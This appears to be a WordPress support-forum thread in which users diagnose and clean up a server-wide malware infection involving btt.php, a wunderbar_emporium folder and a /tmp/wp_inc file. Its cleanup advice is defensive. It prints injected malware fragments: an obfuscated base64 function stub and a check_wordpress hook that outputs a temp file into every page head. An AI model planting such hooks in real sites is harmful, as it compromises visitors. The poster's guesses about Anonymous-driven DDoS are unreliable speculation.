victorciobanu

@keesiemeijer you rock ! btt.php is the key !

logged on to my server, and looked for the file, i only found that file on infected wordpress instalations. btt.php looks to be related to tehnocrati import module and it was used to put some files in the server in /wp-admin/import

while looking for the file i noticed something strange in one of my installs in wp-admin/import/wunderbar_emporium !!! inside this folder there are some files that were not supposed to be there. they are most likely put there by the hacker !

this is mind-blowing stuff ! i will invastigate this further and post the results!

wunderbar_emporium is the name of the linux exploit responsible for all this hassle ! contact your host providers (i run my own server) and notify them about this (check to see if the files are there first)

*edit – this exploit however does not work since workpress uses 2 index.php files … the one the wordpress intall has(root) and the theme’s(wp-content/themes) index.php ; and the code declares function _765258526($i){$a=Array();return base64_decode($a[$i]);} twice, since it’s inserted in both files, causing it to malfunction

so far i have decoded `$GLOBALS[‘_2143977049_’]=Array();
function _765258526($i){$a=Array();return base64_decode($a[$i]);}
$GLOBALS[‘_226432454_’]=Array();` there is another part i cannot decode yet.

Decoding the whole thing would help us find out what was the malware script doing and putting a stop to these kind of recent hacks.

This attack is related to the MW:JS:DEPACK one.
Your linux server is infected, i would recommend changing all the passwords you can (sql,root,ftp).

I had the MW:JS:DEPACK on november 5’th and written an article about it here How to Remove MW:JS:DEPACK.

On 14 nov my server (all index.php) files were infected by this mallware.
I’ve written a tutorial here How to remove Cannot redeclare _765258526 , however i realize now that the issue is with the server and not the wordpress install.

To avoid removing all the code by hand just replace (overwrite) the wordpress install files, then manually clean the theme’s index.php

CHMOD’ing the theme index.php to 444 helps, otherwise the code will be inserted again.

I’m starting to think that these are anonymous’s (the hacker group) DDOS’es at work (they are using our site’s visitors), since both exploits (ms:js:deepack and redeclare_76528526) open an invisible iframe on our site, iframe that loads a certain page at a certain moment (with js:deepack it was facebook)

@jeanettem
either manually update it or just remember to switch it back to 644 (owner has permission to write) before updating the wordpress install.

About the 500 server error, I would recommend backing up your site (sql-database/and files) immediately since the issues might be related .

I have a horror story for you ; a while back (3 weeks) a similar malware code affected one of my wordpress sites created for a client and hosted on justhost and when this issue arose, justhost deleted the sql database. no warnings no nothing … and yes, i did not have a backup ??

I’m not saying that this is the case with your site, but better safe than sorry .

ALSO tho whom might concern the error
Parse error: syntax error, unexpected '<' in /path/www/genericsite.tld/wp-settings.php on line 131 is also caused by this malware ; it affects old wordpress installs where the insertion of

function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . ‘/wp_inc’)){
readfile($t_d . ‘/wp_inc’);
}
}
add_action(‘wp_head’, ‘check_wordpress’);
do_action( ‘init’ );

broke the file.

@jeanettem sorry for being unclear

I run my own server so I have full rights on it so I can access it as root and in my case the /tmp folder of the machine (linux server) was infected !

– this is not the case when you use shared hosting provided to you by a 3’rd party.

When you use a host’s server a /tmp folder is created just for you and in theory (only) in that /tmp folder ( look for in in your root not in /www/…) you should find a wp_inc file. Replace that wp_inc file with a blank one and set it to readonly (chmod 444) so this does not happen again.

This however only fixes this particular issue. You probably still can have other files infected so my best bet would be to also chmod 444 (readonly) the wp-settings.php file in your wordpress install, to prevent it from being infected again. But REMEMBER you did this, since when you upgrade your wordpress this file will not get overwritten (updated) and all hell can break lose,

Happend to me too server-wide (about 30 wordpress installs were affected).
Managed to fix everything in about 10 minutes and written an article about how to fix the issue on my blog : How to Remove MW:JS:DEPACK

To answer kastnercrative’s question your server is infected mate (wp_inc file can be found in /tmp folder) either remove the lines in the wp-settings or the code in the wp_inc file.